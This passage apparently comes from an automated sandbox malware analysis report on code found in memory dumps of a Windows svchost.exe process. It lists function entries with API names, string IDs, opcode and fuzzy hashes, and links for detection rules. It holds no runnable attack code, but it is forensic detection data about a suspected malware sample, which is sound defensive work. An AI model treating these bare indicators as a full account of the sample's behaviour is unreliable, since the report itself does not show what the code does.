                                                                                                                                                                                                                                                • String ID: C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                • API String ID: 3168794593-3822071397
                                                                                                                                                                                                                                                • Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction ID: 00b32960d93923937e65119abd5c1dcf28b03c30f66026aa582642a902e3e0ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59316BB7509AC09FFB558F66A85D28D2FA0F3E9F42F0B8016DAC403387EA2594098700
                                                                                                                                                                                                                                                Function 00000216819BD510 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction ID: 5c52ae74f7ddc9b508f2cc68e7077d448a61f197ea34f71a0585107c8f5e101b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4311B6303046708EFE58A732955D3ED72D66B687FCF164724A87A077DEDE68C8098340
                                                                                                                                                                                                                                                Function 00000216819B19A4 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 517849248-0
                                                                                                                                                                                                                                                • Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction ID: a785752bf74330900625d384dc3d620be5a3ebca11633b9af7793e05491854f5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8012931300A408AEB54DB52B85C79D63A1F798BC1F894035DE8943755DF3CC98D8740
                                                                                                                                                                                                                                                Function 00000216819B36DC Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 449555515-0
                                                                                                                                                                                                                                                • Opcode ID: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction ID: 51d672c049acfc95fcd196a18afc7f38eec3f9cc59ccf9b460144e796f14ae2b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0301E575611B408AEF24DB22F85C79E72B0BBA9B86F064128CA8D17765EF3DC54CC700
                                                                                                                                                                                                                                                Function 00000216819B1A48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                • API String ID: 2719912262-4282027825
                                                                                                                                                                                                                                                • Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction ID: 8da5cbbe4d6bb8a14f153af897fbcda62d7ae12b9d5dd8853b881f13034b0831
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60F04F323046819AEF608B61F49C7DE67A0F768BC8F854130DA8946A55EF7CC68CCB00
                                                                                                                                                                                                                                                Function 00000216819B3058 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CombinePath
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3422762182-91387939
                                                                                                                                                                                                                                                • Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction ID: b73af96e8a47a6d0527908d1dc92b5a7b22636392e623753de926ac529fd503e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42F0A030714B9486EE148B13B91C19DA360EB6CFD0F098030EE8A07B19CF3CC58E8700
                                                                                                                                                                                                                                                Function 00000216819BC208 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction ID: d4f988b161efeb3e7b7bff568bdd6eb425630b625771d81dfa5b61351f0dcb39
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44F06D71211A0486EF148B64F84C3AD6320FBA9BA1F550629DAAE462E4CF2CC44CC300
                                                                                                                                                                                                                                                Function 00000216819B50E0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction ID: 229e00a9c465781b392b78cd0cd3bdf0c9b794ed1186bf7ea0b973ab56e0156d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC02CB36219B948AEB60CB55F49839EB7A1F3D5B94F114115EA8E87BA8DF7CC448CB00
                                                                                                                                                                                                                                                Function 00000216819B5720 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction ID: be500c7dfdd4105a273f80a051afa8bbaeaa17ea96fb611f661f61d4486c925e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F61DB36619B54CAFB60CB15E49C39EB7A0F398784F514115EA8E87BA8DB7CC548CF00
                                                                                                                                                                                                                                                Function 0000021681993A74 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: 0f0b95282461109e40faf74e68c7752b6b6c483ff8225b241b29f6271b1f12ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B311C676F61A000DFE651978D97E3ED31416F79374F0B0634A97E076EADA6C8ACD4200
                                                                                                                                                                                                                                                Function 00000216819C4674 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: f792815cef8b7c4627d9b2860fb30326119901529685bae8c5355aeba82124c1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C511C436B50A518EFF642168EA4E3ED11506B793B8F0B0734BAF7076EECA28984D4200
                                                                                                                                                                                                                                                Function 00000216819B8580 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: c982b19fa4377e11e101d37bb51d771f761c7f3e7469a3702b1533c2db390b39
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF51D332311620CEEF54CF25E48CBAC77A5F768B98F538125EA8A47788DB79C859C700
                                                                                                                                                                                                                                                Function 00000216819BAFC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: 57358ce0ebe6c39b2528c5d5abac73d57a6c78277dde2497c2f859897d371b04
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D161A273508BD48AEB718F15E4483DEB7A0F7A9B98F054215EB9903B99DB7CC198CB00
                                                                                                                                                                                                                                                Function 000002168198A770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: 458d5abda429c4ea281d79907b0f1732159f9f9538b4b2d9e279b25f0bd9240f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97518F365982808FEF749F25944C39C77A0F3A4BA4F1A8116DF8947BD5DB38D899CB01
                                                                                                                                                                                                                                                Function 00000216819BB370 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: 7a93ab4fe560e0e0a38271fa6d979a1deccc988d318c273572c6de70b1330f3b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9518D721046A0CEEF748F26998C39C77A1F365B98F1A4115DB8A87BD5CB78D4A8CB01
                                                                                                                                                                                                                                                Function 00000216819B2F18 Relevance: 6.3, APIs: 5, Instructions: 93memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction ID: 74df5f5ef537270e389c43e684c005ce16e03a9a293af8a84c23fafbf82ef783
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA318332701B658AEF54DF16E54C7AD67A0FB64B80F4A4020DF4C47B55EF38D4A98700
                                                                                                                                                                                                                                                Function 00000216819C25C8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction ID: 411f23bce3e88c341b72d7c991107ad7717c980a74ac115df9daba2b46d94ed8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0D1BE32B15A808DEB21CFA9D5483EC37B1F364BD8F554216DE9DA7B99DA34C44AC340
                                                                                                                                                                                                                                                Function 00000216819C2EF0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction ID: 0be8cfa03d53cb57b6abb7abcd1d48e644ceafe13a72ced1a6208489aef15a50
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9791CD727106948DFF60DF69988C3ED2BB0F764B88F164109DE8E67A94DB35C68AD700
                                                                                                                                                                                                                                                Function 00000216819B7970 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction ID: d2e308a2b4aa95d3dd345c71bd648825a65c40371fa9aafa37475373303f0a64
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44111832710B018AEF00DBA0E8583EC33A4F769758F450E21DA6D867A8EB78D1988340
                                                                                                                                                                                                                                                Function 00000216819B2544 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction ID: e3e0ee880a66244a0dfdc49d4dab3b219d327fe8cecf664af1ce3d55310b2b4d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC71B236200BA189EF34DF25989C3EE7798F7A5784F82012ADD4D47B89DB35E6498704
                                                                                                                                                                                                                                                Function 0000021681987980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 3242871069-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: 09d03c6ab22edbb96724a3b4ca98121e83798b2f6441db1c3f75e410c3f6a88d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1451E2323526008FEF18CF55E44CBADB792F764B98F568125EB4A87788DB79C949C700
                                                                                                                                                                                                                                                Function 000002168198A3C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3163161869-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: 4a691fc3f30871568cbb659e5ddc4cf54a034a6163590912501f94fe6b11e8bb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D561AF72504BC48AEB708F25E4483DEB7A0F7A5BA8F054215EF9947B99DB7CC198CB00
                                                                                                                                                                                                                                                Function 00000216819B2338 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
